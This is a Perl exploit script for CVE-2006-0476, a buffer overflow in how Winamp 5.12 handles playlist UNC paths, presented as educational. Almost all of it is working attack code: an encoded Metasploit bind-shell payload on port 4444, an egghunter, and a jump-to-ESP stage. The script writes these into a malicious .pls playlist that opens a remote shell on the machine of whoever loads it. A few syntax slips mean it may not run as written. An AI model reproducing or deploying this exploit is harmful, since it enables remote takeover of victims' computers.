CVE-2006-0476: Winamp 5.12 Buffer Overflow (Egghunter)

winamp_5.12_Exploit.pl

#!/usr/bin/perl -w
# ====================================================================
# Winamp 5.12 Playlist UNC Path Computer Name Overflow Perl Exploit
# Original Poc by Umesh Wanve (umesh_345@yahoo.com)
# Modified by r00tpgp for educational puposes - 28 May 2018
# Full documentation at www.r00tpgp.com
# ====================================================================

# msfpayload windows/shell_bind_tcp LPORT=4444 R > bind
# msfencode -e x86/alpha_mixed -i bind -t perl
# [*] x86/alpha_mixed succeeded with size 744 (iteration=1)
$bind="" .
"\x89\xe7\xdb\xce\xd9\x77\xf4\x5d\x55\x59\x49\x49\x49\x49" .
"\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51" .
"\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32" .
"\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41" .
"\x42\x75\x4a\x49\x59\x6c\x6d\x38\x6d\x59\x47\x70\x33\x30" .
"\x57\x70\x31\x70\x4f\x79\x78\x65\x50\x31\x38\x52\x30\x64" .
"\x6e\x6b\x61\x42\x36\x50\x4e\x6b\x72\x72\x46\x6c\x6e\x6b" .
"\x51\x42\x37\x64\x4c\x4b\x54\x32\x45\x78\x36\x6f\x78\x37" .
"\x42\x6a\x46\x46\x75\x61\x69\x6f\x56\x51\x39\x50\x4c\x6c" .
"\x35\x6c\x73\x51\x71\x6c\x57\x72\x66\x4c\x35\x70\x79\x51" .
"\x38\x4f\x54\x4d\x73\x31\x38\x47\x4b\x52\x5a\x50\x66\x32" .
"\x36\x37\x4c\x4b\x73\x62\x52\x30\x4e\x6b\x70\x42\x37\x4c" .
"\x66\x61\x7a\x70\x6e\x6b\x31\x50\x74\x38\x6b\x35\x59\x50" .
"\x50\x74\x32\x6a\x66\x61\x38\x50\x52\x70\x6c\x4b\x42\x68" .
"\x65\x48\x4c\x4b\x76\x38\x67\x50\x47\x71\x69\x43\x68\x63" .
"\x37\x4c\x43\x79\x6c\x4b\x67\x44\x6c\x4b\x57\x71\x58\x56" .
"\x70\x31\x4b\x4f\x44\x71\x49\x50\x6e\x4c\x4f\x31\x7a\x6f" .
"\x66\x6d\x46\x61\x5a\x67\x44\x78\x39\x70\x42\x55\x7a\x54" .
"\x47\x73\x31\x6d\x6c\x38\x65\x6b\x63\x4d\x51\x34\x64\x35" .
"\x38\x62\x50\x58\x4c\x4b\x33\x68\x64\x64\x63\x31\x38\x53" .
"\x30\x66\x4e\x6b\x54\x4c\x30\x4b\x6e\x6b\x70\x58\x77\x6c" .
"\x47\x71\x59\x43\x6c\x4b\x34\x44\x6c\x4b\x77\x71\x6e\x30" .
"\x6b\x39\x30\x44\x37\x54\x67\x54\x43\x6b\x73\x6b\x63\x51" .
"\x76\x39\x33\x6a\x33\x61\x49\x6f\x69\x70\x36\x38\x61\x4f" .
"\x50\x5a\x4e\x6b\x77\x62\x6a\x4b\x6d\x56\x61\x4d\x45\x38" .
"\x75\x63\x45\x62\x43\x30\x67\x70\x75\x38\x72\x57\x63\x43" .
"\x70\x32\x31\x4f\x70\x54\x52\x48\x62\x6c\x71\x67\x57\x56" .
"\x57\x77\x59\x6f\x69\x45\x4f\x48\x7a\x30\x45\x51\x55\x50" .
"\x45\x50\x31\x39\x7a\x64\x73\x64\x56\x30\x55\x38\x65\x79" .
"\x4f\x70\x62\x4b\x77\x70\x6b\x4f\x4a\x75\x76\x30\x76\x30" .
"\x70\x50\x56\x30\x71\x50\x72\x70\x67\x30\x50\x50\x73\x58" .
"\x48\x6a\x74\x4f\x49\x4f\x4b\x50\x4b\x4f\x48\x55\x4b\x39" .
"\x59\x57\x74\x71\x4b\x6b\x76\x33\x70\x68\x47\x72\x33\x30" .
"\x66\x71\x63\x6c\x4f\x79\x6d\x36\x42\x4a\x54\x50\x76\x36" .
"\x73\x67\x50\x68\x6f\x32\x69\x4b\x76\x57\x55\x37\x49\x6f" .
"\x79\x45\x42\x73\x73\x67\x65\x38\x38\x37\x39\x79\x77\x48" .
"\x69\x6f\x59\x6f\x4b\x65\x63\x63\x32\x73\x42\x77\x35\x38" .
"\x43\x44\x48\x6c\x77\x4b\x68\x61\x6b\x4f\x5a\x75\x61\x47" .
"\x4e\x69\x38\x47\x72\x48\x44\x35\x72\x4e\x52\x6d\x75\x31" .
"\x49\x6f\x6a\x75\x45\x38\x51\x73\x62\x4d\x32\x44\x47\x70" .
"\x4d\x59\x5a\x43\x63\x67\x72\x77\x33\x67\x34\x71\x6b\x46" .
"\x50\x6a\x67\x62\x50\x59\x71\x46\x38\x62\x39\x6d\x31\x76" .
"\x6a\x67\x37\x34\x76\x44\x67\x4c\x77\x71\x67\x71\x4c\x4d" .
"\x51\x54\x46\x44\x34\x50\x38\x46\x65\x50\x52\x64\x53\x64" .
"\x62\x70\x36\x36\x52\x76\x62\x76\x72\x66\x72\x76\x30\x4e" .
"\x30\x56\x50\x56\x33\x63\x33\x66\x55\x38\x53\x49\x7a\x6c" .
"\x67\x4f\x6c\x46\x59\x6f\x79\x45\x6d\x59\x6d\x30\x30\x4e" .
"\x30\x56\x51\x56\x79\x6f\x34\x70\x35\x38\x47\x78\x6b\x37" .
"\x35\x4d\x75\x30\x59\x6f\x68\x55\x6f\x4b\x7a\x50\x4c\x75" .
"\x4f\x52\x33\x66\x53\x58\x4c\x66\x5a\x35\x6f\x4d\x6d\x4d" .
"\x69\x6f\x49\x45\x75\x6c\x67\x76\x61\x6c\x55\x5a\x6f\x70" .
"\x69\x6b\x39\x70\x50\x75\x66\x65\x4f\x4b\x72\x67\x42\x33" .
"\x33\x42\x52\x4f\x53\x5a\x65\x50\x76\x33\x69\x6f\x4b\x65" .
"\x41\x41";

# Egghunter here! 126 bytes total. 
egghunter= "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49".
"\x49\x49\x49\x49\x49\x49\x37\x49\x49\x49\x49\x49\x51\x5a\x6a\x6a".
"\x58\x50\x30\x41\x31\x42\x41\x6b\x41\x41\x7a\x32\x41\x42\x41\x32".
"\x42\x41\x30\x42\x41\x58\x38\x41\x42\x50\x75\x49\x79\x65\x36\x4d".
"\x51\x4b\x7a\x49\x6f\x56\x6f\x52\x62\x70\x52\x42\x4a\x46\x62\x41".
"\x48\x38\x4d\x46\x4e\x65\x6c\x65\x55\x72\x7a\x50\x74\x7a\x4f\x58".
"\x38\x70\x54\x36\x50\x34\x70\x72\x77\x6e\x6b\x5a\x5a\x4e\x4f\x54".
"\x35\x4b\x5a\x6e\x4f\x51\x65\x4d\x37\x4b\x4f\x5a\x47\x6a";

# Set Header of file
$start= "[playlist]\r\nFile1=\\\\";

# 1st stage shellcode. Jump to 'Call ESP' 0202D961, then reduce stack by 175bytes. Each 58Hex is 88bytes
# Eg: (sub esp, 58, sub esp,58, jmp esp).
$jmp="\x61\xd9\x02\x02"."\x83\xec\x58\x83\xec\x58\xff\xe4"."\x90\x90\x90\x90";

# 2nd stage shellcode. Must add up to 166bytes. Egghunter is 126bytes, remainer 34+6bytes is to make up 166bytes. 
$shellcode = "\x90" x 6 . $egghunter . "\cc" x 34; 

# Final 3rd stage shellcode. Must equal 856bytes. 8bytes for T00WT00W, 744bytes for bind_shell, remainder 104 bytes to make up 856Bytes.
$nop="T00WT00W" . $bind . "\x90" x 104; 

# Set tail end of file.
$end="\r\nTitle1=pwnd\r\nLength1=512\r\nNumberOfEntries=1\r\nVersion=2\r\n";

open (MYFILE, '>poc-00.pls');
print MYFILE $start;
print MYFILE $nop;
print MYFILE $shellcode;
print MYFILE $jmp;
print MYFILE $end;
close (MYFILE);